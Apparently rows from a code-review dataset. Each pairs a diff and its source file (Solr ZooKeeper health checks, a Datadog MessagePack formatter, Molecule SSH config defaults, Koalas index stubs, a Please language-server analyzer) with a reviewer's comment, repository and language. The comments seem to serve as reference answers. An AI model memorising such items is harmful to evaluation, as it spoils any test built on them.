List<String> lines = getZkRawResponse(zkHostPort, "ruok");
validateZkRawResponse(lines, zkHostPort, "ruok");
boolean ok = "imok".equals(lines.get(0));
obj.put("ok", ok);
lines = getZkRawResponse(zkHostPort, "mntr");
validateZkRawResponse(lines, zkHostPort, "mntr");
for (String line : lines) {
String[] parts = line.split("\t");
if (parts.length >= 2) {
obj.put(parts[0], parts[1]);
} else {
String err = String.format(Locale.ENGLISH, "Unexpected line in 'mntr' response from Zookeeper %s: %s", zkHostPort, line);
log.warn(err);
errors.add(err);
}
}
lines = getZkRawResponse(zkHostPort, "conf");
validateZkRawResponse(lines, zkHostPort, "conf");
for (String line : lines) {
String[] parts = line.split("=");
if (parts.length >= 2) {
obj.put(parts[0], parts[1]);
} else if (!line.startsWith("membership:")) {
String err = String.format(Locale.ENGLISH, "Unexpected line in 'conf' response from Zookeeper %s: %s", zkHostPort, line);
log.warn(err);
errors.add(err);
}
}
obj.put("errors", errors);
return obj;
}
/**
* Sends a four-letter-word command to one particular Zookeeper server and returns the response as list of strings
* @param zkHostPort the host:port for one zookeeper server to access
* @param fourLetterWordCommand the custom 4-letter command to send to Zookeeper
* @return a list of lines returned from Zookeeper
*/
protected List<String> getZkRawResponse(String zkHostPort, String fourLetterWordCommand) {
String[] hostPort = zkHostPort.split(":");
String host = hostPort[0];
int port = ZOOKEEPER_DEFAULT_PORT;
if (hostPort.length > 1) {
port = Integer.parseInt(hostPort[1]);
}
try (
Socket socket = new Socket(host, port);
Writer writer = new OutputStreamWriter(socket.getOutputStream(), StandardCharsets.UTF_8);
PrintWriter out = new PrintWriter(writer, true);
BufferedReader in = new BufferedReader(new InputStreamReader(socket.getInputStream(), StandardCharsets.UTF_8))) {
out.println(fourLetterWordCommand);
List<String> response = in.lines().collect(Collectors.toList());
log.debug("Got response from ZK on host {} and port {}: {}", host, port, response);
return response;
} catch (IOException e) {
throw new SolrException(SolrException.ErrorCode.SERVER_ERROR, "Failed talking to Zookeeper " + zkHostPort, e);
}
}
/**
* Takes the raw response lines returned by {@link #getZkRawResponse(String, String)} and runs some validations
* @param response the lines
* @param zkHostPort the host
* @param fourLetterWordCommand the 4lw command
* @return true if validation succeeds
* @throws SolrException if validation fails
*/
protected boolean validateZkRawResponse(List<String> response, String zkHostPort, String fourLetterWordCommand) {
if (response == null || response.isEmpty() || (response.size() == 1 && response.get(0).isBlank())) {
throw new SolrException(SolrException.ErrorCode.SERVER_ERROR, "Empty response from Zookeeper " + zkHostPort);
}
if (response.size() == 1 && response.get(0).contains("not in the whitelist")) {
throw new SolrException(SolrException.ErrorCode.SERVER_ERROR, "Could not execute " + fourLetterWordCommand +
" towards ZK host " + zkHostPort + ". Add this line to the 'zoo.cfg' " +
"configuration file on each zookeeper node: '4lw.commands.whitelist=mntr,conf,ruok'. See also chapter " +
"'Setting Up an External ZooKeeper Ensemble' in the Solr Reference Guide.");
}
return true;
}
}
| 1 | 35,900 | This is not bullet proof if e.g. user has `clientPort=1234` in `zoo.cfg` and in zkHost connection string. Then we'll add a warning that dynamic config differs from zkHost, which is not entirely true since we just lack the port part. We have no way from client to read the `clientPort` from server except from connecting to the server with 4LW *ont the clientPort* which is a chicken and egg. This hack will make the comparison work for default port, which is a compromise. | apache-lucene-solr | java |
@@ -1,8 +1,8 @@
#if MESSAGEPACK_2_1
using System;
using Datadog.Trace.ExtensionMethods;
-using MessagePack;
-using MessagePack.Formatters;
+using Datadog.Trace.Vendors.MessagePack;
+using Datadog.Trace.Vendors.MessagePack.Formatters;
namespace Datadog.Trace.Agent.MessagePack
{ | 1 | #if MESSAGEPACK_2_1
using System;
using Datadog.Trace.ExtensionMethods;
using MessagePack;
using MessagePack.Formatters;
namespace Datadog.Trace.Agent.MessagePack
{
internal class SpanMessagePackFormatter : IMessagePackFormatter<Span>
{
public void Serialize(ref MessagePackWriter writer, Span value, MessagePackSerializerOptions options)
{
// First, pack array length (or map length).
// It should be the number of members of the object to be serialized.
var len = 8;
if (value.Context.ParentId != null)
{
len++;
}
if (value.Error)
{
len++;
}
if (value.Tags != null)
{
len++;
}
if (value.Metrics != null)
{
len++;
}
writer.WriteMapHeader(len);
writer.Write("trace_id");
writer.Write(value.Context.TraceId);
writer.Write("span_id");
writer.Write(value.Context.SpanId);
writer.Write("name");
writer.Write(value.OperationName);
writer.Write("resource");
writer.Write(value.ResourceName);
writer.Write("service");
writer.Write(value.ServiceName);
writer.Write("type");
writer.Write(value.Type);
writer.Write("start");
writer.Write(value.StartTime.ToUnixTimeNanoseconds());
writer.Write("duration");
writer.Write(value.Duration.ToNanoseconds());
if (value.Context.ParentId != null)
{
writer.Write("parent_id");
writer.Write((ulong)value.Context.ParentId);
}
if (value.Error)
{
writer.Write("error");
writer.Write(1);
}
if (value.Tags != null)
{
writer.Write("meta");
writer.WriteMapHeader(value.Tags.Count);
foreach (var pair in value.Tags)
{
writer.Write(pair.Key);
writer.Write(pair.Value);
}
}
if (value.Metrics != null)
{
writer.Write("metrics");
writer.WriteMapHeader(value.Metrics.Count);
foreach (var pair in value.Metrics)
{
writer.Write(pair.Key);
writer.Write(pair.Value);
}
}
}
public Span Deserialize(ref MessagePackReader reader, MessagePackSerializerOptions options)
{
throw new NotImplementedException();
}
}
}
#endif
| 1 | 17,382 | We can probably delete this entire file. It's not used now and we'll (probably) write a custom serializer before we ever switch to MessagePack 2.1. | DataDog-dd-trace-dotnet | .cs |
@@ -174,8 +174,11 @@ class ConfigV1(Config):
'limit': 'all',
'playbook': 'playbook.yml',
'raw_ssh_args': [
- '-o UserKnownHostsFile=/dev/null', '-o IdentitiesOnly=yes',
- '-o ControlMaster=auto', '-o ControlPersist=60s'
+ '-o UserKnownHostsFile=/dev/null',
+ '-o IdentitiesOnly=yes',
+ '-o ControlMaster=auto',
+ '-o ControlPersist=60s',
+ '-o IdentitiesOnly=yes',
],
'tags': False,
'timeout': 30, | 1 | # Copyright (c) 2015-2016 Cisco Systems, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
import abc
import os
import os.path
import anyconfig
import m9dicts
from re import sub
from molecule import util
PROJECT_CONFIG = 'molecule.yml'
LOCAL_CONFIG = os.path.expanduser('~/.config/molecule/config.yml')
MERGE_STRATEGY = anyconfig.MS_DICTS
class Config(object):
__metaclass__ = abc.ABCMeta
def __init__(self, configs=[LOCAL_CONFIG, PROJECT_CONFIG]):
"""
Base initializer for all Config classes.
:param command_args: A list configs files to merge.
:returns: None
"""
self.config = self._get_config(configs)
@property
def molecule_file(self):
return PROJECT_CONFIG
@property
def molecule_local_config_file(self):
return LOCAL_CONFIG
@abc.abstractmethod
def _get_config(self, configs):
pass # pragma: no cover
class ConfigV1(Config):
def __init__(self, configs=[LOCAL_CONFIG, PROJECT_CONFIG]):
"""
Initialize a new config version one class and returns None.
"""
super(ConfigV1, self).__init__(configs)
self._build_config_paths()
def molecule_file_exists(self):
return os.path.isfile(self.molecule_file)
def molecule_local_config_file_exists(self):
return os.path.isfile(self.molecule_local_config_file)
def populate_instance_names(self, platform):
"""
Updates instances section of config with an additional key containing
the full instance name
:param platform: platform name to pass to ``format_instance_name`` call
:return: None
"""
if 'vagrant' in self.config:
for instance in self.config['vagrant']['instances']:
instance['vm_name'] = util.format_instance_name(
instance['name'], platform,
self.config['vagrant']['instances'])
def _get_config(self, configs):
return self._combine(configs)
def _combine(self, configs):
""" Perform a prioritized recursive merge of serveral source files
and returns a new dict.
The merge order is based on the index of the list, meaning that
elements at the end of the list will be merged last, and have greater
precedence than elements at the beginning. The result is then merged
ontop of the defaults.
:param configs: A list containing the yaml files to load.
:return: dict
"""
default = self._get_defaults()
conf = anyconfig.to_container(default, ac_merge=MERGE_STRATEGY)
conf.update(
anyconfig.load(
configs, ignore_missing=True, ac_merge=MERGE_STRATEGY))
return self._expand_env_vars(m9dicts.convert_to(conf))
def _expand_env_vars(self, config):
""" Recursively searches for occurences of ${} and expands
them to a corresponding environment variable or an empty
string.
:param config: An iterable containing the merged config
:return: dict
"""
def __get_env_var(matchobj):
return os.environ.get(matchobj.group(1), '')
def __replace_matches(line):
if not isinstance(line, basestring):
return line
return sub('\$\{([^\}]*)\}', __get_env_var, line)
def __recursive_string_replace(config):
if isinstance(config, dict):
# Replace dict keys
for i in list(config):
new_name = __replace_matches(i)
if i != new_name:
val = config[i]
del config[i]
config[new_name] = val
# Replace dict values
for k, v in config.iteritems():
if isinstance(v, (dict, list)):
__recursive_string_replace(v)
else:
config[k] = __replace_matches(v)
else:
# Replace list items
for i, v in enumerate(config):
if isinstance(v, (dict, list)):
__recursive_string_replace(v)
else:
config[i] = __replace_matches(v)
__recursive_string_replace(config)
return config
def _get_defaults(self):
return {
'ansible': {
'ask_become_pass': False,
'ask_vault_pass': False,
'become': True,
'become_user': False,
'config_file': 'ansible.cfg',
'ansiblecfg_defaults': {
'retry_files_enabled': False,
},
'ansiblecfg_ssh_connection': {},
'diff': True,
'host_key_checking': False,
'inventory_file': 'ansible_inventory',
'limit': 'all',
'playbook': 'playbook.yml',
'raw_ssh_args': [
'-o UserKnownHostsFile=/dev/null', '-o IdentitiesOnly=yes',
'-o ControlMaster=auto', '-o ControlPersist=60s'
],
'tags': False,
'timeout': 30,
'vault_password_file': False,
'verbose': False
},
'molecule': {
'goss_dir': 'tests',
'goss_playbook': 'test_default.yml',
'ignore_paths': ['.git', '.vagrant', '.molecule'],
'init': {
'platform': {
'box': 'trusty64',
'box_url':
('https://vagrantcloud.com/ubuntu/boxes/trusty64/'
'versions/14.04/providers/virtualbox.box'),
'box_version': '0.1.0',
'name': 'trusty64'
},
'provider': {
'name': 'virtualbox',
'type': 'virtualbox'
}
},
'molecule_dir': '.molecule',
'rakefile_file': 'rakefile',
'raw_ssh_args': [
'-o StrictHostKeyChecking=no',
'-o UserKnownHostsFile=/dev/null'
],
'serverspec_dir': 'spec',
'state_file': 'state.yml',
'test': {
'sequence': [
'destroy', 'dependency', 'syntax', 'create',
'converge', 'idempotence', 'verify'
]
},
'testinfra_dir': 'tests',
'vagrantfile_file': 'vagrantfile',
},
'verifier': {
'name': 'testinfra',
'options': {}
},
'dependency': {
'name': 'galaxy',
'options': {}
},
'_disabled': [],
}
def _build_config_paths(self):
"""
Convenience function to build up paths from our config values. Path
will not be relative to ``molecule_dir``, when a full path was provided
in the config.
:return: None
"""
md = self.config.get('molecule')
ad = self.config.get('ansible')
for item in ['state_file', 'vagrantfile_file', 'rakefile_file']:
if md and not self._is_path(md[item]):
md[item] = os.path.join(md['molecule_dir'], md[item])
for item in ['config_file', 'inventory_file']:
if ad and not self._is_path(ad[item]):
ad[item] = os.path.join(md['molecule_dir'], ad[item])
def _is_path(self, pathname):
return os.path.sep in pathname
def merge_dicts(a, b):
"""
Merges the values of B into A and returns a new dict. Uses the same merge
strategy as ``config._combine``.
::
dict a
b:
- c: 0
- c: 2
d:
e: "aaa"
f: 3
dict b
a: 1
b:
- c: 3
d:
e: "bbb"
Will give an object such as::
{'a': 1, 'b': [{'c': 3}], 'd': {'e': "bbb", 'f': 3}}
:param a: the target dictionary
:param b: the dictionary to import
:return: dict
"""
conf = anyconfig.to_container(a, ac_merge=MERGE_STRATEGY)
conf.update(b)
return conf
| 1 | 6,939 | Aren't you duplicating this option? | ansible-community-molecule | py |
@@ -440,6 +440,17 @@ func (a *Analyzer) IsBuildFile(uri lsp.DocumentURI) bool {
return a.State.Config.IsABuildFile(base)
}
+// IsBuildDefFile takes a uri path and check if it's a valid .build_defs file
+func (a *Analyzer) IsBuildDefFile(uri lsp.DocumentURI) bool {
+ filepath, err := GetPathFromURL(uri, "file")
+ if err != nil {
+ return false
+ }
+
+ base := path.Base(filepath)
+ return strings.HasSuffix(base, ".build_defs")
+}
+
// e.g. src type:list, required:false
func getArgString(argument asp.Argument) string {
argType := strings.Join(argument.Type, "|") | 1 | package langserver
import (
"context"
"core"
"fmt"
"io/ioutil"
"path"
"sort"
"strconv"
"strings"
"parse/asp"
"parse/rules"
"src/fs"
"tools/build_langserver/lsp"
)
// Analyzer is a wrapper around asp.parser
// This is being loaded into a handler on initialization
type Analyzer struct {
parser *asp.Parser
State *core.BuildState
BuiltIns map[string]*RuleDef
Attributes map[string][]*RuleDef
}
// RuleDef is a wrapper around asp.FuncDef,
// it also includes a Header(function definition)
// And Argument map stores the name and the information of the arguments this rule has
type RuleDef struct {
*asp.FuncDef
Header string
ArgMap map[string]*Argument
// This applies when the FuncDef is a attribute of an object
Object string
}
// Argument is a wrapper around asp.Argument,
// this is used to store the argument information for specific rules,
// and it also tells you if the argument is required
type Argument struct {
*asp.Argument
definition string
required bool
}
// Identifier is a wrapper around asp.Identifier
// Including the starting line and the ending line number
type Identifier struct {
*asp.IdentStatement
Type string
Pos lsp.Position
EndPos lsp.Position
}
// BuildDef is the definition for a build target.
// often a function call using a specific build rule
type BuildDef struct {
*Identifier
BuildDefName string
Visibility []string
// The content of the build definition
Content string
}
// Statement is a simplified version of asp.Statement
// Here we only care about Idents and Expressions
type Statement struct {
Ident *Identifier
Expression *asp.Expression
}
// BuildLabel is a wrapper around core.BuildLabel
// Including the path of the buildFile
type BuildLabel struct {
*core.BuildLabel
// Path of the build file
Path string
// IdentStatement for the build definition,
// usually the call to the specific buildrule, such as "go_library()"
BuildDef *BuildDef
// The content of the build definition
Definition string
}
func newAnalyzer() (*Analyzer, error) {
// Saving the state to Analyzer,
// so we will be able to get the CONFIG properties by calling state.config.GetTags()
config, err := core.ReadDefaultConfigFiles("")
if err != nil {
return nil, err
}
state := core.NewBuildState(1, nil, 4, config)
parser := asp.NewParser(state)
a := &Analyzer{
parser: parser,
State: state,
}
a.builtInsRules()
return a, nil
}
// BuiltInsRules gets all the builtin functions and rules as a map, and store it in Analyzer.BuiltIns
// This is typically called when instantiate a new Analyzer
func (a *Analyzer) builtInsRules() error {
statementMap := make(map[string]*RuleDef)
attrMap := make(map[string][]*RuleDef)
dir, _ := rules.AssetDir("")
sort.Strings(dir)
// Iterate through the directory and get the builtin statements
for _, filename := range dir {
if !strings.HasSuffix(filename, ".gob") {
asset := rules.MustAsset(filename)
stmts, err := a.parser.ParseData(asset, filename)
if err != nil {
log.Fatalf("%s", err)
}
// Iterate through the statement we got and add to statementMap
for _, statement := range stmts {
if statement.FuncDef != nil && !strings.HasPrefix(statement.FuncDef.Name, "_") {
content := string(asset)
ruleDef := newRuleDef(content, statement)
statementMap[statement.FuncDef.Name] = ruleDef
// Fill in attribute map if certain ruleDef is a attribute
if ruleDef.Object != "" {
if _, ok := attrMap[ruleDef.Object]; ok {
attrMap[ruleDef.Object] = append(attrMap[ruleDef.Object], ruleDef)
} else {
attrMap[ruleDef.Object] = []*RuleDef{ruleDef}
}
}
}
}
}
}
a.BuiltIns = statementMap
a.Attributes = attrMap
return nil
}
func newRuleDef(content string, stmt *asp.Statement) *RuleDef {
ruleDef := &RuleDef{
FuncDef: stmt.FuncDef,
ArgMap: make(map[string]*Argument),
}
// Fill in the header property of ruleDef
contentStrSlice := strings.Split(content, "\n")
headerSlice := contentStrSlice[stmt.Pos.Line-1 : stmt.FuncDef.EoDef.Line]
if len(stmt.FuncDef.Arguments) > 0 {
for i, arg := range stmt.FuncDef.Arguments {
// Check if it a builtin type method, and reconstruct header if it is
if i == 0 && arg.Name == "self" {
originalDef := fmt.Sprintf("def %s(self:%s", stmt.FuncDef.Name, arg.Type[0])
if len(stmt.FuncDef.Arguments) > 1 {
originalDef += ", "
}
newDef := fmt.Sprintf("%s.%s(", arg.Type[0], stmt.FuncDef.Name)
headerSlice[0] = strings.Replace(headerSlice[0], originalDef, newDef, 1)
ruleDef.Object = arg.Type[0]
} else {
// Fill in the ArgMap
argString := getArgString(arg)
ruleDef.ArgMap[arg.Name] = &Argument{
Argument: &arg,
definition: argString,
required: arg.Value == nil,
}
}
}
}
ruleDef.Header = strings.TrimSuffix(strings.Join(headerSlice, "\n"), ":")
return ruleDef
}
// AspStatementFromFile gets all the Asp.Statement from a given BUILD file
// *reads complete files only*
func (a *Analyzer) AspStatementFromFile(uri lsp.DocumentURI) ([]*asp.Statement, error) {
filepath, err := GetPathFromURL(uri, "file")
if err != nil {
return nil, err
}
bytecontent, err := ioutil.ReadFile(filepath)
if err != nil {
return nil, err
}
stmts, _ := a.parser.ParseData(bytecontent, filepath)
if err != nil {
log.Warning(fmt.Sprintf("parsing failure: %s ", err))
}
return stmts, nil
}
// StatementFromPos returns a Statement struct with either an Identifier or asp.Expression
func (a *Analyzer) StatementFromPos(uri lsp.DocumentURI, position lsp.Position) (*Statement, error) {
// Get all the statements from the build file
stmts, err := a.AspStatementFromFile(uri)
if err != nil {
return nil, err
}
statement, expr := asp.StatementOrExpressionFromAst(stmts,
asp.Position{Line: position.Line + 1, Column: position.Character + 1})
if statement != nil {
return &Statement{
Ident: a.identFromStatement(statement),
}, nil
} else if expr != nil {
return &Statement{
Expression: expr,
}, nil
}
return nil, nil
}
func (a *Analyzer) identFromStatement(stmt *asp.Statement) *Identifier {
// get the identifier type
var identType string
if stmt.Ident.Action != nil {
if stmt.Ident.Action.Property != nil {
identType = "property"
} else if stmt.Ident.Action.Call != nil {
identType = "call"
} else if stmt.Ident.Action.Assign != nil {
identType = "assign"
} else if stmt.Ident.Action.AugAssign != nil {
identType = "augAssign"
}
}
ident := &Identifier{
IdentStatement: stmt.Ident,
Type: identType,
// -1 from asp.Statement.Pos.Line, as lsp position requires zero index
Pos: lsp.Position{Line: stmt.Pos.Line - 1, Character: stmt.Pos.Column - 1},
EndPos: lsp.Position{Line: stmt.EndPos.Line - 1, Character: stmt.EndPos.Column - 1},
}
return ident
}
// BuildLabelFromString returns a BuildLabel object,
func (a *Analyzer) BuildLabelFromString(ctx context.Context,
currentURI lsp.DocumentURI, labelStr string) (*BuildLabel, error) {
filepath, err := GetPathFromURL(currentURI, "file")
if err != nil {
return nil, err
}
label, err := core.TryParseBuildLabel(labelStr, path.Dir(filepath))
if err != nil {
return nil, err
}
if label.IsEmpty() {
return nil, fmt.Errorf("empty build label %s", labelStr)
}
// Get the BUILD file path for the build label
// Handling subrepo
if label.Subrepo != "" {
return &BuildLabel{
BuildLabel: &label,
Path: label.PackageDir(),
BuildDef: nil,
Definition: "Subrepo label: " + labelStr,
}, nil
}
labelPath := string(a.BuildFileURIFromPackage(label.PackageDir()))
if !fs.PathExists(labelPath) {
return nil, fmt.Errorf("cannot find the path for build label %s", labelStr)
}
// Get the BuildDef and BuildDefContent for the BuildLabel
var buildDef *BuildDef
var definition string
if label.IsAllSubpackages() {
// Check for cases such as "//tools/build_langserver/..."
definition = "BuildLabel includes all subpackages in path: " + path.Join(path.Dir(labelPath))
} else if label.IsAllTargets() {
// Check for cases such as "//tools/build_langserver/all"
definition = "BuildLabel includes all BuildTargets in BUILD file: " + labelPath
} else {
buildDef, err = a.BuildDefFromLabel(ctx, &label, labelPath)
if err != nil {
return nil, err
}
definition = buildDef.Content
}
return &BuildLabel{
BuildLabel: &label,
Path: labelPath,
BuildDef: buildDef,
Definition: definition,
}, nil
}
// BuildDefFromLabel returns a BuildDef struct given an *core.BuildLabel and the path of the label
func (a *Analyzer) BuildDefFromLabel(ctx context.Context, label *core.BuildLabel, path string) (*BuildDef, error) {
if label.IsAllSubpackages() || label.IsAllTargets() {
return nil, nil
}
// Get the BuildDef IdentStatement from the build file
buildDef, err := a.getBuildDefByName(ctx, label.Name, path)
if err != nil {
return nil, err
}
// Get the content for the BuildDef
labelfileContent, err := ReadFile(ctx, lsp.DocumentURI(path))
if err != nil {
return nil, err
}
buildDef.Content = strings.Join(labelfileContent[buildDef.Pos.Line:buildDef.EndPos.Line+1], "\n")
return buildDef, nil
}
// getBuildDefByName returns an Identifier object of a BuildDef(call of a Build rule)
// based on the name and the buildfile path
func (a *Analyzer) getBuildDefByName(ctx context.Context, name string, path string) (*BuildDef, error) {
buildDefs, err := a.BuildDefsFromURI(ctx, lsp.DocumentURI(path))
if err != nil {
return nil, err
}
if buildDef, ok := buildDefs[name]; ok {
return buildDef, nil
}
return nil, fmt.Errorf("cannot find BuildDef for the name '%s' in '%s'", name, path)
}
// BuildDefsFromURI returns a map of buildDefname : *BuildDef
func (a *Analyzer) BuildDefsFromURI(ctx context.Context, uri lsp.DocumentURI) (map[string]*BuildDef, error) {
// Get all the statements from the build file
stmts, err := a.AspStatementFromFile(uri)
if err != nil {
return nil, err
}
buildDefs := make(map[string]*BuildDef)
var defaultVisibility []string
for _, stmt := range stmts {
if stmt.Ident == nil {
continue
}
ident := a.identFromStatement(stmt)
if ident.Type != "call" {
continue
}
// Filling in buildDef struct based on arg
var buildDef *BuildDef
for _, arg := range ident.Action.Call.Arguments {
switch arg.Name {
case "default_visibility":
defaultVisibility = aspListToStrSlice(arg.Value.Val.List)
case "name":
buildDef = &BuildDef{
Identifier: ident,
BuildDefName: TrimQuotes(arg.Value.Val.String),
}
case "visibility":
if buildDefs != nil {
buildDef.Visibility = aspListToStrSlice(arg.Value.Val.List)
}
}
}
// Set visibility
if buildDef != nil {
if buildDef.Visibility == nil {
if len(defaultVisibility) > 0 {
buildDef.Visibility = defaultVisibility
} else {
currentPkg, err := PackageLabelFromURI(uri)
if err != nil {
return nil, err
}
buildDef.Visibility = []string{currentPkg}
}
}
// Get the content for the BuildDef
labelfileContent, err := ReadFile(ctx, uri)
if err != nil {
return nil, err
}
buildDef.Content = strings.Join(labelfileContent[buildDef.Pos.Line:buildDef.EndPos.Line+1], "\n")
buildDefs[buildDef.BuildDefName] = buildDef
}
}
return buildDefs, nil
}
// BuildFileURIFromPackage takes a relative(to the reporoot) package directory, and returns a build file path
func (a *Analyzer) BuildFileURIFromPackage(packageDir string) lsp.DocumentURI {
for _, i := range a.State.Config.Parse.BuildFileName {
buildFilePath := path.Join(packageDir, i)
if !strings.HasPrefix(packageDir, core.RepoRoot) {
buildFilePath = path.Join(core.RepoRoot, buildFilePath)
}
if fs.FileExists(buildFilePath) {
return lsp.DocumentURI(buildFilePath)
}
}
return lsp.DocumentURI("")
}
// IsBuildFile takes a uri path and check if it's a valid build file
func (a *Analyzer) IsBuildFile(uri lsp.DocumentURI) bool {
filepath, err := GetPathFromURL(uri, "file")
if err != nil {
return false
}
base := path.Base(filepath)
return a.State.Config.IsABuildFile(base)
}
// e.g. src type:list, required:false
func getArgString(argument asp.Argument) string {
argType := strings.Join(argument.Type, "|")
required := strconv.FormatBool(argument.Value == nil)
argString := argument.Name + " required:" + required
if argType != "" {
argString += ", type:" + argType
}
return argString
}
func aspListToStrSlice(listVal *asp.List) []string {
var retSlice []string
for _, i := range listVal.Values {
if i.Val.String != "" {
retSlice = append(retSlice, TrimQuotes(i.Val.String))
}
}
return retSlice
}
| 1 | 8,541 | I'm not sure we should be doing this based on the extension? Calling them `.build_defs` is just a convention | thought-machine-please | go |
@@ -30,7 +30,6 @@ def unsupported_property(property_name, deprecated=False, reason=""):
class _MissingPandasLikeIndex(object):
# Properties
- T = unsupported_property('T')
nbytes = unsupported_property('nbytes')
shape = unsupported_property('shape')
| 1 | #
# Copyright (C) 2019 Databricks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from databricks.koalas.missing import _unsupported_function, _unsupported_property, common
def unsupported_function(method_name, deprecated=False, reason=""):
return _unsupported_function(class_name='pd.Index', method_name=method_name,
deprecated=deprecated, reason=reason)
def unsupported_property(property_name, deprecated=False, reason=""):
return _unsupported_property(class_name='pd.Index', property_name=property_name,
deprecated=deprecated, reason=reason)
class _MissingPandasLikeIndex(object):
# Properties
T = unsupported_property('T')
nbytes = unsupported_property('nbytes')
shape = unsupported_property('shape')
# Deprecated properties
strides = unsupported_property('strides', deprecated=True)
data = unsupported_property('data', deprecated=True)
itemsize = unsupported_property('itemsize', deprecated=True)
base = unsupported_property('base', deprecated=True)
flags = unsupported_property('flags', deprecated=True)
# Functions
append = unsupported_function('append')
argmax = unsupported_function('argmax')
argmin = unsupported_function('argmin')
argsort = unsupported_function('argsort')
asof = unsupported_function('asof')
asof_locs = unsupported_function('asof_locs')
delete = unsupported_function('delete')
difference = unsupported_function('difference')
drop = unsupported_function('drop')
drop_duplicates = unsupported_function('drop_duplicates')
droplevel = unsupported_function('droplevel')
dropna = unsupported_function('dropna')
duplicated = unsupported_function('duplicated')
equals = unsupported_function('equals')
factorize = unsupported_function('factorize')
fillna = unsupported_function('fillna')
format = unsupported_function('format')
get_indexer = unsupported_function('get_indexer')
get_indexer_for = unsupported_function('get_indexer_for')
get_indexer_non_unique = unsupported_function('get_indexer_non_unique')
get_level_values = unsupported_function('get_level_values')
get_loc = unsupported_function('get_loc')
get_slice_bound = unsupported_function('get_slice_bound')
get_value = unsupported_function('get_value')
groupby = unsupported_function('groupby')
holds_integer = unsupported_function('holds_integer')
identical = unsupported_function('identical')
insert = unsupported_function('insert')
intersection = unsupported_function('intersection')
is_ = unsupported_function('is_')
is_lexsorted_for_tuple = unsupported_function('is_lexsorted_for_tuple')
is_mixed = unsupported_function('is_mixed')
is_type_compatible = unsupported_function('is_type_compatible')
join = unsupported_function('join')
map = unsupported_function('map')
max = unsupported_function('max')
min = unsupported_function('min')
nunique = unsupported_function('nunique')
putmask = unsupported_function('putmask')
ravel = unsupported_function('ravel')
reindex = unsupported_function('reindex')
repeat = unsupported_function('repeat')
searchsorted = unsupported_function('searchsorted')
set_names = unsupported_function('set_names')
set_value = unsupported_function('set_value')
slice_indexer = unsupported_function('slice_indexer')
slice_locs = unsupported_function('slice_locs')
sort = unsupported_function('sort')
sort_values = unsupported_function('sort_values')
sortlevel = unsupported_function('sortlevel')
symmetric_difference = unsupported_function('symmetric_difference')
take = unsupported_function('take')
to_flat_index = unsupported_function('to_flat_index')
to_frame = unsupported_function('to_frame')
to_native_types = unsupported_function('to_native_types')
to_numpy = unsupported_function('to_numpy')
transpose = unsupported_function('transpose')
union = unsupported_function('union')
value_counts = unsupported_function('value_counts')
view = unsupported_function('view')
where = unsupported_function('where')
# Deprecated functions
get_duplicates = unsupported_function('get_duplicates', deprecated=True)
summary = unsupported_function('summary', deprecated=True)
get_values = unsupported_function('get_values', deprecated=True)
item = unsupported_function('item', deprecated=True)
contains = unsupported_function('contains', deprecated=True)
# Properties we won't support.
values = common.values(unsupported_property)
array = common.array(unsupported_property)
# Functions we won't support.
memory_usage = common.memory_usage(unsupported_function)
to_list = common.to_list(unsupported_function)
tolist = common.tolist(unsupported_function)
__iter__ = common.__iter__(unsupported_function)
class _MissingPandasLikeMultiIndex(object):
# Properties
T = unsupported_property('T')
is_all_dates = unsupported_property('is_all_dates')
levshape = unsupported_property('levshape')
shape = unsupported_property('shape')
# Deprecated properties
strides = unsupported_property('strides', deprecated=True)
data = unsupported_property('data', deprecated=True)
base = unsupported_property('base', deprecated=True)
itemsize = unsupported_property('itemsize', deprecated=True)
labels = unsupported_property('labels', deprecated=True)
flags = unsupported_property('flags', deprecated=True)
# Functions
append = unsupported_function('append')
argmax = unsupported_function('argmax')
argmin = unsupported_function('argmin')
argsort = unsupported_function('argsort')
asof = unsupported_function('asof')
asof_locs = unsupported_function('asof_locs')
delete = unsupported_function('delete')
difference = unsupported_function('difference')
drop = unsupported_function('drop')
drop_duplicates = unsupported_function('drop_duplicates')
droplevel = unsupported_function('droplevel')
dropna = unsupported_function('dropna')
duplicated = unsupported_function('duplicated')
equal_levels = unsupported_function('equal_levels')
equals = unsupported_function('equals')
factorize = unsupported_function('factorize')
fillna = unsupported_function('fillna')
format = unsupported_function('format')
get_indexer = unsupported_function('get_indexer')
get_indexer_for = unsupported_function('get_indexer_for')
get_indexer_non_unique = unsupported_function('get_indexer_non_unique')
get_level_values = unsupported_function('get_level_values')
get_loc = unsupported_function('get_loc')
get_loc_level = unsupported_function('get_loc_level')
get_locs = unsupported_function('get_locs')
get_slice_bound = unsupported_function('get_slice_bound')
get_value = unsupported_function('get_value')
groupby = unsupported_function('groupby')
holds_integer = unsupported_function('holds_integer')
identical = unsupported_function('identical')
insert = unsupported_function('insert')
intersection = unsupported_function('intersection')
is_ = unsupported_function('is_')
is_lexsorted = unsupported_function('is_lexsorted')
is_lexsorted_for_tuple = unsupported_function('is_lexsorted_for_tuple')
is_mixed = unsupported_function('is_mixed')
is_type_compatible = unsupported_function('is_type_compatible')
join = unsupported_function('join')
map = unsupported_function('map')
max = unsupported_function('max')
min = unsupported_function('min')
nunique = unsupported_function('nunique')
putmask = unsupported_function('putmask')
ravel = unsupported_function('ravel')
reindex = unsupported_function('reindex')
